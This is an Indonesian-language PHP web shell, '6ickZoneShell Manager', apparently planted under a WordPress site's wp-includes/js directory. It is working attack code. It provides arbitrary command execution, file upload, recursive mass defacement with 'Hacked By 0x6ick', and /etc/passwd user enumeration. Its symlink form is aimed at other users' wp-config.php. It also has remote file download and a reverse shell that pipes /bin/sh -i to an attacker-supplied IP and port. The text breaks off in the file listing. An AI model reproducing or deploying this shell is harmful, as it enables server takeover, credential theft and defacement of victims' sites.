File: //sites/nuofama.com/wp-includes/js/wp-work.php
<?php
/**
* 6ickZoneShell Manager by 0x6ick x Nyx6st | Copyright 2025 by 6ickwhispers@gmail.com
* --- RE-ORGANIZED MENU VERSION by Nyx6st ---
* All features integrated, with new menu layout and network tools.
**/
error_reporting(0);
session_start();
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
ini_set('memory_limit', '256M');
header('Content-Type: text/html; charset=UTF-8');
ob_end_clean();
// --- CONFIG ---
$title = "ヤミRoot VoidGate";
$author = "0x6ick";
$theme_bg = "#0a0a0f"; // Dark violet-black cyber base
$theme_fg = "#E0FF00"; // Neon yellow text
$theme_highlight = "#FF00C8"; // Pink cyber glow
$theme_link = "#00FFF7"; // Electric cyan
$theme_link_hover = "#FF00A0"; // Pink on hover
$theme_border_color = "#7D00FF"; // Neon purple border
$theme_table_header_bg = "#1a0025"; // Dark purple-ish header
$theme_table_row_hover = "#330033"; // Deep glitch violet
$theme_input_bg = "#120024"; // Dark form input bg
$theme_input_fg = "#00FFB2"; // Neon greenish-cyan input text
$font_family = "'Orbitron', sans-serif"; // Futuristic mecha font
$message_success_color = "#39FF14"; // Bright lime green
$message_error_color = "#FF0033"; // Neon blood red
// --- FUNCTIONS ---
function sanitizeFilename($filename) { return basename($filename); }
function exe($cmd) { if (function_exists('exec')) { exec($cmd . ' 2>&1', $output); return implode("\n", $output); } elseif (function_exists('shell_exec')) { return shell_exec($cmd); } elseif (function_exists('passthru')) { ob_start(); passthru($cmd); return ob_get_clean(); } elseif (function_exists('system')) { ob_start(); system($cmd); return ob_get_clean(); } return "Command execution disabled."; }
function perms($file){ $perms = @fileperms($file); if ($perms === false) return '????'; if (($perms & 0xC000) == 0xC000) $info = 's'; elseif (($perms & 0xA000) == 0xA000) $info = 'l'; elseif (($perms & 0x8000) == 0x8000) $info = '-'; elseif (($perms & 0x6000) == 0x6000) $info = 'b'; elseif (($perms & 0x4000) == 0x4000) $info = 'd'; elseif (($perms & 0x2000) == 0x2000) $info = 'c'; elseif (($perms & 0x1000) == 0x1000) $info = 'p'; else $info = 'u'; $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; }
function delete_recursive($target) { if (!file_exists($target)) return true; if (!is_dir($target)) return unlink($target); foreach (scandir($target) as $item) { if ($item == '.' || $item == '..') continue; if (!delete_recursive($target . DIRECTORY_SEPARATOR . $item)) return false; } return rmdir($target); }
function zip_add_folder($zip, $folder, $base_path_length) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder), RecursiveIteratorIterator::LEAVES_ONLY); foreach ($files as $file) { if (!$file->isDir()) { $file_path = $file->getRealPath(); $relative_path = substr($file_path, $base_path_length); $zip->addFile($file_path, $relative_path); } } }
function redirect_with_message($msg_type = '', $msg_text = '', $current_path = '') { global $path; $redirect_path = !empty($current_path) ? $current_path : $path; $params = ['path' => $redirect_path]; if ($msg_type) $params['msg_type'] = $msg_type; if ($msg_text) $params['msg_text'] = $msg_text; header("Location: ?" . http_build_query($params)); exit(); }
// --- INITIAL SETUP & PATH ---
$path = realpath(isset($_GET['path']) ? $_GET['path'] : getcwd());
$path = str_replace('\\','/',$path);
// --- HANDLERS FOR ACTIONS THAT REDIRECT ---
if(isset($_POST['start_mass_deface'])) { $mass_deface_results = ''; function mass_deface_recursive($dir, $file, $content, &$res) { if(!is_writable($dir)) {$res .= "[<font color=red>FAILED</font>] ".htmlspecialchars($dir)."<br>"; return;} foreach(scandir($dir) as $item) { if($item === '.' || $item === '..') continue; $lokasi = $dir.DIRECTORY_SEPARATOR.$item; if(is_dir($lokasi)) { if(is_writable($lokasi)) { file_put_contents($lokasi.DIRECTORY_SEPARATOR.$file, $content); $res .= "[<font color=lime>DONE</font>] ".htmlspecialchars($lokasi.DIRECTORY_SEPARATOR.$file)."<br>"; mass_deface_recursive($lokasi, $file, $content, $res); } else { $res .= "[<font color=red>FAILED</font>] ".htmlspecialchars($lokasi)."<br>"; } } } } function mass_deface_flat($dir, $file, $content, &$res) { if(!is_writable($dir)) {$res .= "[<font color=red>FAILED</font>] ".htmlspecialchars($dir)."<br>"; return;} foreach(scandir($dir) as $item) { if($item === '.' || $item === '..') continue; $lokasi = $dir.DIRECTORY_SEPARATOR.$item; if(is_dir($lokasi) && is_writable($lokasi)) { file_put_contents($lokasi.DIRECTORY_SEPARATOR.$file, $content); $res .= "[<font color=lime>DONE</font>] ".htmlspecialchars($lokasi.DIRECTORY_SEPARATOR.$file)."<br>"; } } } if($_POST['tipe_sabun'] == 'mahal') mass_deface_recursive($_POST['d_dir'], $_POST['d_file'], $_POST['script_content'], $mass_deface_results); else mass_deface_flat($_POST['d_dir'], $_POST['d_file'], $_POST['script_content'], $mass_deface_results); $_SESSION['feature_output'] = $mass_deface_results; redirect_with_message('success', 'Mass Deface Selesai!', $path); }
if(isset($_FILES['file_upload'])){ $file_name = sanitizeFilename($_FILES['file_upload']['name']); if(copy($_FILES['file_upload']['tmp_name'], $path.'/'.$file_name)) redirect_with_message('success', 'UPLOAD SUCCESS: ' . $file_name, $path); else redirect_with_message('error', 'File Gagal Diupload !!', $path); }
if (isset($_POST['bulk_action']) && class_exists('ZipArchive')) { $action = $_POST['bulk_action']; $selected_files = isset($_POST['selected_files']) ? $_POST['selected_files'] : []; if ($action === 'zip_selected' && !empty($selected_files)) { $zip_filename = 'archive_' . date('Y-m-d_H-i-s') . '.zip'; $zip_filepath = $path . DIRECTORY_SEPARATOR . $zip_filename; $zip = new ZipArchive(); if ($zip->open($zip_filepath, ZipArchive::CREATE | ZipArchive::OVERWRITE) === TRUE) { foreach ($selected_files as $file) { $file_path = realpath($file); if (is_file($file_path)) $zip->addFile($file_path, basename($file_path)); elseif (is_dir($file_path)) zip_add_folder($zip, $file_path, strlen(dirname($file_path) . DIRECTORY_SEPARATOR)); } $zip->close(); redirect_with_message('success', 'File berhasil di-zip ke: ' . $zip_filename, $path); } else { redirect_with_message('error', 'Gagal membuat file zip!', $path); } } }
if(isset($_GET['option']) && isset($_POST['opt_action'])){ $target_full_path = $_POST['path_target']; $action = $_POST['opt_action']; $current_dir = realpath(isset($_GET['path']) ? $_GET['path'] : getcwd()); switch ($action) { case 'delete': if (delete_recursive($target_full_path)) redirect_with_message('success', 'DELETE SUCCESS !!', $current_dir); else redirect_with_message('error', 'Gagal menghapus! Periksa izin.', $current_dir); break; case 'chmod_save': if(chmod($target_full_path, octdec($_POST['perm_value']))) redirect_with_message('success', 'CHMOD SUCCESS !!', $current_dir); else redirect_with_message('error', 'CHMOD Gagal !!', $current_dir); break; case 'rename_save': $new_full_path = dirname($target_full_path).'/'.sanitizeFilename($_POST['new_name_value']); if(rename($target_full_path, $new_full_path)) redirect_with_message('success', 'RENAME SUCCESS !!', $current_dir); else redirect_with_message('error', 'RENAME Gagal !!', $current_dir); break; case 'edit_save': if(is_writable($target_full_path)) { if(file_put_contents($target_full_path, $_POST['src_content'])) redirect_with_message('success', 'EDIT SUCCESS !!', $current_dir); else redirect_with_message('error', 'Edit File Gagal !!', $current_dir); } else { redirect_with_message('error', 'File tidak writable!', $current_dir); } break; case 'extract_save': if (class_exists('ZipArchive')) { $zip = new ZipArchive; if ($zip->open($target_full_path) === TRUE) { $zip->extractTo($current_dir); $zip->close(); redirect_with_message('success', 'File berhasil diekstrak!', $current_dir); } else { redirect_with_message('error', 'Gagal membuka file zip!', $current_dir); } } else { redirect_with_message('error', 'Class ZipArchive tidak ditemukan!', $current_dir); } break; } }
if(isset($_GET['create_new'])) { $target_path_new = $path . '/' . sanitizeFilename($_POST['create_name']); if ($_POST['create_type'] == 'file') { if (@file_put_contents($target_path_new, '') !== false) redirect_with_message('success', 'File Baru Berhasil Dibuat', $path); else redirect_with_message('error', 'Gagal membuat file baru!', $path); } elseif ($_POST['create_type'] == 'dir') { if (@mkdir($target_path_new)) redirect_with_message('success', 'Folder Baru Berhasil Dibuat', $path); else redirect_with_message('error', 'Gagal membuat folder baru!', $path); } }
if(isset($_POST['curl_download'])) { $url = $_POST['url']; $filename = sanitizeFilename(basename($url)); if (empty($filename)) { $filename = 'downloaded_file'; } if (copy($url, $path . '/' . $filename)) { redirect_with_message('success', 'File ' . $filename . ' berhasil di-download!', $path); } else { redirect_with_message('error', 'Gagal men-download file dari URL!', $path); } }
?>
<!DOCTYPE HTML>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="https://fonts.googleapis.com/css2?family=Orbitron:wght@400;700&family=Kelly+Slab&display=swap" rel="stylesheet">
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css" rel="stylesheet"/>
<title><?php echo htmlspecialchars($title); ?></title>
<style>
:root {
--bg-color: <?php echo $theme_bg; ?>;
--fg-color: <?php echo $theme_fg; ?>;
--highlight-color: <?php echo $theme_highlight; ?>;
--link-color: <?php echo $theme_link; ?>;
--link-hover-color: <?php echo $theme_link_hover; ?>;
--border-color: <?php echo $theme_border_color; ?>;
--table-header-bg: <?php echo $theme_table_header_bg; ?>;
--table-row-hover: <?php echo $theme_table_row_hover; ?>;
--input-bg: <?php echo $theme_input_bg; ?>;
--input-fg: <?php echo $theme_input_fg; ?>;
--success-color: <?php echo $message_success_color; ?>;
--error-color: <?php echo $message_error_color; ?>;
--font-primary: <?php echo $font_family; ?>;
--font-secondary: 'Kelly Slab', cursive;
}
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: var(--font-primary);
background: linear-gradient(135deg, var(--bg-color), #1a1a2e);
color: var(--fg-color);
line-height: 1.6;
min-height: 100vh;
padding: 20px 10px;
}
a {
color: var(--link-color);
text-decoration: none;
transition: color 0.3s ease, transform 0.2s ease;
}
a:hover {
color: var(--link-hover-color);
transform: translateY(-2px);
}
h1 {
font-family: var(--font-secondary);
font-size: 2.5rem;
text-align: center;
color: white;
text-shadow: 0 0 10px var(--highlight-color);
margin: 20px 0;
}
h3 {
font-family: var(--font-secondary);
color: var(--highlight-color);
margin-bottom: 15px;
text-shadow: 0 0 5px var(--highlight-color);
}
.container {
max-width: 100%;
width: 100%;
margin: 0 auto;
padding: 0 20px;
}
.system-info-table {
width: 100%;
border-collapse: collapse;
margin: 20px 0;
background: rgba(0, 0, 0, 0.3);
border-radius: 10px;
overflow: hidden;
}
.system-info-table td {
padding: 12px;
border-bottom: 1px solid var(--border-color);
}
.main-menu {
display: flex;
flex-wrap: wrap;
justify-content: center;
gap: 20px; /* Reduced gap for tighter button spacing */
background: rgba(0, 0, 0, 0.5);
padding: 25px;
border-radius: 10px;
margin: 20px 0;
border: 1px solid var(--border-color);
box-shadow: 0 0 15px rgba(125, 0, 255, 0.3);
}
.main-menu div {
margin: 0 5px; /* Reduced margin for consistent spacing */
}
.main-menu a {
padding: 12px 25px;
border-radius: 5px;
background: rgba(255, 255, 255, 0.05);
transition: background 0.3s ease, transform 0.2s ease;
min-width: 120px;
text-align: center;
display: inline-block;
}
.main-menu a:hover {
background: var(--table-row-hover);
transform: translateY(-3px);
}
.path-nav {
background: rgba(0, 0, 0, 0.3);
padding: 10px 15px;
border-radius: 5px;
margin: 15px 0;
word-break: break-all;
}
.message {
padding: 12px;
margin: 15px 0;
border-radius: 5px;
text-align: center;
font-weight: bold;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.5);
}
.message.success {
background: var(--success-color);
color: var(--bg-color);
}
.message.error {
background: var(--error-color);
color: white;
}
.section-box {
background: rgba(0, 0, 0, 0.4);
border: 1px solid var(--border-color);
padding: 20px;
margin: 20px 0;
border-radius: 10px;
box-shadow: 0 0 20px rgba(125, 0, 255, 0.2);
}
table {
width: 100%;
border-collapse: collapse;
margin: 15px 0;
background: rgba(0, 0, 0, 0.3);
border-radius: 10px;
overflow: hidden;
}
#content th, #content td {
padding: 12px;
border-bottom: 1px solid var(--border-color);
text-align: left;
vertical-align: middle;
}
#content tr:hover {
background: var(--table-row-hover);
}
#content .first {
background: var(--table-header-bg);
font-weight: bold;
text-transform: uppercase;
}
.td_home {
padding: 12px;
border-bottom: 1px solid var(--border-color);
}
input, select, textarea {
border: 1px solid var(--link-hover-color);
border-radius: 5px;
background: var(--input-bg);
color: var(--input-fg);
font-family: var(--font-secondary);
padding: 8px;
transition: border-color 0.3s ease, box-shadow 0.3s ease;
}
input:focus, select:focus, textarea:focus {
outline: none;
border-color: var(--highlight-color);
box-shadow: 0 0 8px var(--highlight-color);
}
input[type="submit"] {
background: var(--input-bg);
color: var(--fg-color);
border: 2px solid var(--fg-color);
cursor: pointer;
font-weight: bold;
padding: 8px 20px;
margin: 0 5px;
transition: all 0.3s ease;
}
input[type="submit"]:hover {
background: var(--fg-color);
color: var(--input-bg);
transform: translateY(-2px);
}
/* New styles for form elements spacing */
.form-group {
margin-bottom: 15px; /* Space between form elements */
}
.form-group input[type="text"], .form-group input[type="submit"], .form-group select {
margin-right: 10px; /* Space between inputs and buttons */
}
.form-group input[type="submit"] {
margin-top: 10px; /* Additional top margin for submit buttons */
}
/* Style for reverse shell info box */
.info-box {
background: #222;
border: 1px solid #444;
padding: 15px;
margin-bottom: 15px;
border-radius: 5px;
overflow: hidden; /* Prevent overflow */
}
.info-box ol {
padding-left: 20px; /* Proper indentation for list */
margin: 0; /* Remove default margin */
word-wrap: break-word; /* Ensure text wraps */
}
pre {
background: #0e0e0e;
border: 1px solid #444;
padding: 15px;
border-radius: 5px;
overflow-x: auto;
white-space: pre-wrap;
word-wrap: break-word;
color: #00FFD1;
}
code {
background: #333;
color: #FFB800;
padding: 2px 5px;
border-radius: 3px;
}
details summary {
cursor: pointer;
background: #222;
padding: 10px;
border-radius: 5px;
margin-bottom: 10px;
transition: background 0.3s ease;
}
details summary:hover {
background: var(--table-row-hover);
}
hr {
border: none;
border-top: 1px solid var(--border-color);
margin: 20px auto;
width: 95%;
}
footer {
text-align: center;
margin-top: 30px;
color: #fff;
font-size: 0.9rem;
}
footer b {
color: #7e52c6;
}
@media (max-width: 768px) {
h1 { font-size: 2rem; }
.main-menu {
flex-direction: column;
align-items: center;
gap: 15px;
}
.main-menu div {
margin: 5px 0;
}
.main-menu a {
display: block;
margin: 10px 0;
width: 100%;
max-width: 250px;
}
table, .system-info-table { font-size: 0.9rem; }
.td_home { padding: 8px; }
.form-group input[type="text"], .form-group input[type="submit"], .form-group select {
margin-right: 0; /* Remove right margin on mobile */
width: 100%; /* Full width on mobile */
margin-bottom: 10px; /* Stack elements vertically */
}
}
</style>
</head>
<body>
<div class="container">
<a href="?"><h1><?php echo htmlspecialchars($title); ?></h1></a>
<?php
if(isset($_GET['msg_text'])) { echo "<div class='message ".htmlspecialchars($_GET['msg_type'])."'>".htmlspecialchars($_GET['msg_text'])."</div>"; }
if(isset($_SESSION['feature_output'])) { echo '<div class="section-box"><h3>Hasil Fitur Sebelumnya:</h3><pre>'.$_SESSION['feature_output'].'</pre></div>'; unset($_SESSION['feature_output']); }
?>
<table class="system-info-table">
<tr><td><i class='fas fa-user'></i> User / IP</td><td><?php echo $_SERVER['REMOTE_ADDR']; ?></td></tr>
<tr><td><i class='fas fa-desktop'></i> Host / Server</td><td><?php echo gethostbyname($_SERVER['HTTP_HOST'])." / ".$_SERVER['SERVER_NAME']; ?></td></tr>
<tr><td><i class='fas fa-hdd'></i> System</td><td><?php echo php_uname(); ?></td></tr>
</table>
<div class="main-menu">
<div>
<a href="?path=<?php echo urlencode($path); ?>&action=cmd">Command</a>
<a href="?path=<?php echo urlencode($path); ?>&action=upload_form">Upload</a>
<a href="?path=<?php echo urlencode($path); ?>&action=create_form">Create</a>
<a href="?path=<?php echo urlencode($path); ?>&action=mass_deface_form">Mass Deface</a>
<a href="?path=<?php echo urlencode($path); ?>&action=jumping">Jumping</a>
<a href="?path=<?php echo urlencode($path); ?>&action=symlink">Symlink</a>
<a href="?path=<?php echo urlencode($path); ?>&action=reverse_shell">Reverse Shell</a>
</div>
<div>
<a href="?path=<?php echo urlencode($path); ?>&action=ping">Ping</a>
<a href="?path=<?php echo urlencode($path); ?>&action=portscan">Port Scan</a>
<a href="?path=<?php echo urlencode($path); ?>&action=dnslookup">DNS Lookup</a>
<a href="?path=<?php echo urlencode($path); ?>&action=whois">Whois</a>
<a href="?path=<?php echo urlencode($path); ?>&action=header">Header</a>
<a href="?path=<?php echo urlencode($path); ?>&action=curl">cURL</a>
</div>
</div>
<div class="path-nav">
<i class="fas fa-folder"></i> :
<?php
$paths_array = explode('/', trim($path, '/'));
echo '<a href="?path=/">/</a>';
$current_built_path = '';
foreach($paths_array as $pat){
if(empty($pat)) continue;
$current_built_path .= '/' . $pat;
echo '<a href="?path='.urlencode($current_built_path).'">'.htmlspecialchars($pat).'</a>/';
}
?>
</div>
<?php
$show_file_list = true;
if (isset($_GET['action'])) {
$show_file_list = false;
echo '<div class="section-box">';
switch ($_GET['action']) {
case 'cmd':
$cmd_output = (isset($_POST['do_cmd'])) ? htmlspecialchars(exe($_POST['cmd_input'])) : '';
echo '<h3>Execute Command</h3><form method="POST" action="?action=cmd&path='.urlencode($path).'"><div class="form-group"><input type="text" name="cmd_input" placeholder="whoami" style="width: calc(100% - 90px);" autofocus><input type="submit" name="do_cmd" value=">>" style="width: 80px;"></div></form>';
if($cmd_output) echo '<h4>Output:</h4><pre>'.$cmd_output.'</pre>';
break;
case 'upload_form':
echo '<h3>Upload File</h3><form enctype="multipart/form-data" method="POST" action="?path='.urlencode($path).'"><div class="form-group"><input type="file" name="file_upload" required/><input type="submit" value="UPLOAD"/></div></form>';
break;
case 'create_form':
echo '<h3>Create New</h3><form method="POST" action="?create_new=true&path='.urlencode($path).'"><div class="form-group"><select name="create_type"><option value="file">File</option><option value="dir">Folder</option></select> <input type="text" name="create_name" required placeholder="Nama file/folder"> <input type="submit" value="Create"></div></form>';
break;
case 'mass_deface_form':
echo '<h3>Mass Deface</h3><form method="post" action="?path='.urlencode($path).'"><div class="form-group"><p>Tipe:<br><input type="radio" name="tipe_sabun" value="murah" checked>Biasa (1 level) | <input type="radio" name="tipe_sabun" value="mahal">Massal (Rekursif)</p></div><div class="form-group"><p>Folder Target:<br><input type="text" name="d_dir" value="'.htmlspecialchars($path).'" style="width:100%"></p></div><div class="form-group"><p>Nama File:<br><input type="text" name="d_file" value="index.html" style="width:100%"></p></div><div class="form-group"><p>Isi Script:<br><textarea name="script_content" style="width:100%;height:150px">Hacked By 0x6ick</textarea></p></div><div class="form-group"><input type="submit" name="start_mass_deface" value="GAS!" style="width:100%"></div></form>';
break;
case 'jumping':
echo '<h3><i class="fas fa-users"></i> Jumping (User Scanner)</h3><p>Membaca <code>/etc/passwd</code> untuk menemukan semua user di server dan memeriksa akses direktori home.</p>';
if (is_readable('/etc/passwd')) {
preg_match_all('/(^[a-zA-Z0-9\._-]+):x:/m', file_get_contents('/etc/passwd'), $matches);
if(!empty($matches[1])){
echo '<table><tr class="first"><th>Username</th><th>Home Directory</th><th>Status</th><th>Aksi</th></tr>';
foreach ($matches[1] as $user) {
$home_dir = '/home/' . $user;
if (is_readable($home_dir)) {
$status = '<font color="lime">Bisa Dibaca</font>';
$action = '<a href="?path='.urlencode($home_dir).'">Jelajahi</a>';
} else {
$status = '<font color="red">Tidak Bisa Dibaca</font>';
$action = '-';
}
echo '<tr><td class="td_home">'.htmlspecialchars($user).'</td><td class="td_home">'.htmlspecialchars($home_dir).'</td><td class="td_home">'.$status.'</td><td class="td_home">'.$action.'</td></tr>';
}
echo '</table>';
}
} else {
echo '<p style="color:red;"><strong>Gagal:</strong> File <code>/etc/passwd</code> tidak bisa dibaca.</p>';
}
break;
case 'symlink':
echo '<h3><i class="fas fa-link"></i> Symlink Creator</h3>';
if (!function_exists('symlink')) {
echo '<p style="color:red;"><strong>Gagal:</strong> Fungsi <code>symlink()</code> dinonaktifkan di server ini.</p>';
} else {
if (isset($_POST['create_symlink'])) {
if (symlink($_POST['target_file'], $path . DIRECTORY_SEPARATOR . sanitizeFilename($_POST['link_name']))) {
echo '<p style="color:lime;"><strong>Sukses!</strong> Symlink dibuat. Akses di: <a href="'.htmlspecialchars(sanitizeFilename($_POST['link_name'])).'" target="_blank">'.htmlspecialchars($path . DIRECTORY_SEPARATOR . sanitizeFilename($_POST['link_name'])).'</a></p>';
} else {
echo '<p style="color:red;"><strong>Gagal!</strong> Tidak bisa membuat symlink.</p>';
}
}
echo '<form method="POST" action="?action=symlink&path='.urlencode($path).'"><div class="form-group"><p>Target File (Full Path):<br><input type="text" name="target_file" style="width:100%" placeholder="/home/userlain/public_html/wp-config.php"></p></div><div class="form-group"><p>Nama Link (di direktori ini):<br><input type="text" name="link_name" style="width:100%" placeholder="config_lain.txt"></p></div><div class="form-group"><input type="submit" name="create_symlink" value="Buat Symlink"></div></form>';
}
break;
case 'reverse_shell':
echo '<h3><i class="fas fa-terminal"></i> Reverse Shell</h3>';
if (!function_exists('fsockopen') || !function_exists('proc_open')) {
echo '<p style="color:red;"><strong>Gagal:</strong> Fungsi <code>fsockopen()</code> atau <code>proc_open()</code> dinonaktifkan.</p>';
} else {
$ip_attacker = isset($_POST['ip_attacker']) ? htmlspecialchars($_POST['ip_attacker']) : $_SERVER['REMOTE_ADDR'];
$port_attacker = isset($_POST['port_attacker']) ? htmlspecialchars($_POST['port_attacker']) : '4444';
echo '<div class="info-box"><h4><i class="fas fa-info-circle"></i> Cara Pakai:</h4><ol><li>Di terminalmu, jalankan listener: <code>nc -lvnp '.$port_attacker.'</code></li><li>Masukkan <strong>IP Publik</strong> komputermu di bawah.</li><li>Klik "GASKEUN!". Halaman browser ini mungkin akan terus loading (normal).</li><li>Cek terminalmu, shell server akan muncul jika berhasil.</li></ol></div>';
echo '<form method="POST" action="?action=reverse_shell&path='.urlencode($path).'"><div class="form-group"><label>IP Attacker: <input type="text" name="ip_attacker" value="'.$ip_attacker.'"></label> <label>Port: <input type="text" name="port_attacker" value="'.$port_attacker.'" size="5"></label></div><div class="form-group"><input type="submit" name="start_reverse_shell" value="GASKEUN!"></div></form>';
if (isset($_POST['start_reverse_shell'])) {
echo "<h4>Mencoba koneksi ke ".htmlspecialchars($_POST['ip_attacker']).":".htmlspecialchars($_POST['port_attacker'])." ...</h4>";
if(ob_get_level()) ob_end_flush();
flush();
set_time_limit(0);
ignore_user_abort(true);
$sock = @fsockopen($_POST['ip_attacker'], (int)$_POST['port_attacker'], $errno, $errstr, 30);
if (!$sock) {
echo '<p style="color:red;"><strong>Koneksi Gagal!</strong> Pastikan listener sudah berjalan.</p>';
} else {
echo '<p style="color:lime;"><strong>Koneksi Berhasil!</strong> Cek terminalmu sekarang!</p>';
if(ob_get_level()) ob_end_flush();
flush();
$process = proc_open('/bin/sh -i', array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
if (is_resource($process)) proc_close($process);
}
}
}
break;
case 'ping':
$ping_output = (isset($_POST['do_ping'])) ? htmlspecialchars(exe("ping -c 4 ".escapeshellarg($_POST['target_host']))) : '';
echo '<h3>Ping</h3><form method="POST" action="?action=ping&path='.urlencode($path).'"><div class="form-group"><input type="text" name="target_host" placeholder="google.com" required><input type="submit" name="do_ping" value="Ping"></div></form>';
if($ping_output) echo '<h4>Output:</h4><pre>'.$ping_output.'</pre>';
break;
case 'portscan':
$scan_output = (isset($_POST['do_scan'])) ? htmlspecialchars(exe("nmap -p ".escapeshellarg($_POST['ports'])." ".escapeshellarg($_POST['target_host']))) : '';
echo '<h3>Port Scan (nmap)</h3><form method="POST" action="?action=portscan&path='.urlencode($path).'"><div class="form-group"><label>Host: <input type="text" name="target_host" placeholder="scanme.nmap.org" required></label></div><div class="form-group"><label>Ports: <input type="text" name="ports" placeholder="21,22,80,443" required></label></div><div class="form-group"><input type="submit" name="do_scan" value="Scan"></div></form>';
if($scan_output) echo '<h4>Output:</h4><pre>'.$scan_output.'</pre>';
break;
case 'dnslookup':
$dns_output = (isset($_POST['do_lookup'])) ? htmlspecialchars(exe("dig ".escapeshellarg($_POST['target_domain'])." ".escapeshellarg($_POST['record_type']))) : '';
echo '<h3>DNS Lookup (dig)</h3><form method="POST" action="?action=dnslookup&path='.urlencode($path).'"><div class="form-group"><label>Domain: <input type="text" name="target_domain" placeholder="google.com" required></label></div><div class="form-group"><label>Record Type: <select name="record_type"><option>A</option><option>MX</option><option>NS</option><option>TXT</option><option>ANY</option></select></label></div><div class="form-group"><input type="submit" name="do_lookup" value="Lookup"></div></form>';
if($dns_output) echo '<h4>Output:</h4><pre>'.$dns_output.'</pre>';
break;
case 'whois':
$whois_output = (isset($_POST['do_whois'])) ? htmlspecialchars(exe("whois ".escapeshellarg($_POST['target_domain']))) : '';
echo '<h3>Whois Lookup</h3><form method="POST" action="?action=whois&path='.urlencode($path).'"><div class="form-group"><input type="text" name="target_domain" placeholder="google.com" required><input type="submit" name="do_whois" value="Whois"></div></form>';
if($whois_output) echo '<h4>Output:</h4><pre>'.$whois_output.'</pre>';
break;
case 'header':
$header_output = '';
if (isset($_POST['get_header'])) {
$url = $_POST['target_url'];
if(filter_var($url, FILTER_VALIDATE_URL)) {
$headers = get_headers($url, 1);
$header_output = htmlspecialchars(print_r($headers, true));
} else {
$header_output = 'URL tidak valid.';
}
}
echo '<h3>HTTP Header Viewer</h3><form method="POST" action="?action=header&path='.urlencode($path).'"><div class="form-group"><input type="text" name="target_url" placeholder="http://google.com" required style="width: calc(100% - 110px);"><input type="submit" name="get_header" value="Get Header"></div></form>';
if($header_output) echo '<h4>Output:</h4><pre>'.$header_output.'</pre>';
break;
case 'curl':
echo '<h3>cURL Downloader</h3><form method="POST" action="?path='.urlencode($path).'"><div class="form-group"><label>URL File:<br><input type="text" name="url" placeholder="https://example.com/file.txt" required style="width:100%"></label></div><div class="form-group"><input type="submit" name="curl_download" value="Download ke Direktori Ini"></div></form>';
break;
case 'delete':
echo '<h3>Konfirmasi Hapus: '.htmlspecialchars(basename($_GET['target_file'])).'</h3><p style="color:red;text-align:center;">Anda YAKIN? Tindakan ini tidak bisa dibatalkan.</p><form method="POST" action="?option=true&path='.urlencode($path).'"><input type="hidden" name="path_target" value="'.htmlspecialchars($_GET['target_file']).'"><input type="hidden" name="opt_action" value="delete"><input type="submit" value="YA, HAPUS" style="background:red;color:white;"/> <a href="?path='.urlencode($path).'" style="margin-left:15px;">BATAL</a></form>';
break;
case 'extract_form':
echo '<h3>Konfirmasi Ekstrak: '.htmlspecialchars(basename($_GET['target_file'])).'</h3><p>Ekstrak semua isi file ini ke direktori saat ini ('.htmlspecialchars($path).')?</p><form method="POST" action="?option=true&path='.urlencode($path).'"><input type="hidden" name="path_target" value="'.htmlspecialchars($_GET['target_file']).'"><input type="hidden" name="opt_action" value="extract_save"><input type="submit" value="YA, EKSTRAK"/> <a href="?path='.urlencode($path).'" style="margin-left:15px;">BATAL</a></form>';
break;
case 'view_file':
echo '<h3>Viewing: '.htmlspecialchars(basename($_GET['target_file'])).'</h3><textarea style="width:100%;height:400px;" readonly>'.htmlspecialchars(@file_get_contents($_GET['target_file'])).'</textarea>';
break;
case 'edit_form':
echo '<h3>Editing: '.htmlspecialchars(basename($_GET['target_file'])).'</h3><form method="POST" action="?option=true&path='.urlencode($path).'"><textarea name="src_content" style="width:100%;height:400px;">'.htmlspecialchars(@file_get_contents($_GET['target_file'])).'</textarea><br><input type="hidden" name="path_target" value="'.htmlspecialchars($_GET['target_file']).'"><input type="hidden" name="opt_action" value="edit_save"><input type="submit" value="SAVE"/></form>';
break;
case 'rename_form':
echo '<h3>Rename: '.htmlspecialchars(basename($_GET['target_file'])).'</h3><form method="POST" action="?option=true&path='.urlencode($path).'"><div class="form-group">New Name: <input name="new_name_value" type="text" value="'.htmlspecialchars(basename($_GET['target_file'])).'"/><input type="hidden" name="path_target" value="'.htmlspecialchars($_GET['target_file']).'"><input type="hidden" name="opt_action" value="rename_save"><input type="submit" value="RENAME"/></div></form>';
break;
case 'chmod_form':
$current_perms = substr(sprintf('%o', @fileperms($_GET['target_file'])), -4);
echo '<h3>Chmod: '.htmlspecialchars(basename($_GET['target_file'])).'</h3><form method="POST" action="?option=true&path='.urlencode($path).'"><div class="form-group">Permission: <input name="perm_value" type="text" size="4" value="'.$current_perms.'"/><input type="hidden" name="path_target" value="'.htmlspecialchars($_GET['target_file']).'"><input type="hidden" name="opt_action" value="chmod_save"><input type="submit" value="CHMOD"/></div></form>';
break;
}
echo '</div>';
}
if ($show_file_list) {
echo '<form method="POST" action="?path='.urlencode($path).'">';
echo '<div id="content"><table><tr class="first"><th style="width: 5%;"><input type="checkbox" onclick="document.querySelectorAll(\'.file-checkbox\').forEach(e=>e.checked=this.checked);"></th><th style="width: 50%;">Name</th><th style="width: 15%;">Size</th><th style="width: 15%;">Perm</th><th style="width: 15%;">Options</th></tr>';
$scandir_items = @scandir($path);
if ($scandir_items) {
usort($scandir_items, function($a, $b) use ($path) { if ($a == '..') return -1; if ($b == '..') return 1; if (is_dir($path.'/'.$a) && !is_dir($path.'/'.$b)) return -1; if (!is_dir($path.'/'.$a) && is_dir($path.'/'.$b)) return 1; return strcasecmp($a, $b); });
foreach($scandir_items as $item){
if($item == '.') continue;
